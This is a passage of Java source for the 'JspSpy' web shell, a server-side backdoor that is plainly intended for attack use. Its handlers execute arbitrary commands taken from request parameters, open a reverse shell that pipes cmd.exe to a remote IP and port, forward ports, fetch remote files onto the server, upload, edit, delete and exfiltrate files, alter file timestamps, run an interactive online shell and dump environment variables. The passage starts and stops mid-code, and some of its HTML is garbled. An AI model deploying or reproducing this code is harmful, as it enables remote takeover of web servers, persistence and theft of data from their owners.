    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); 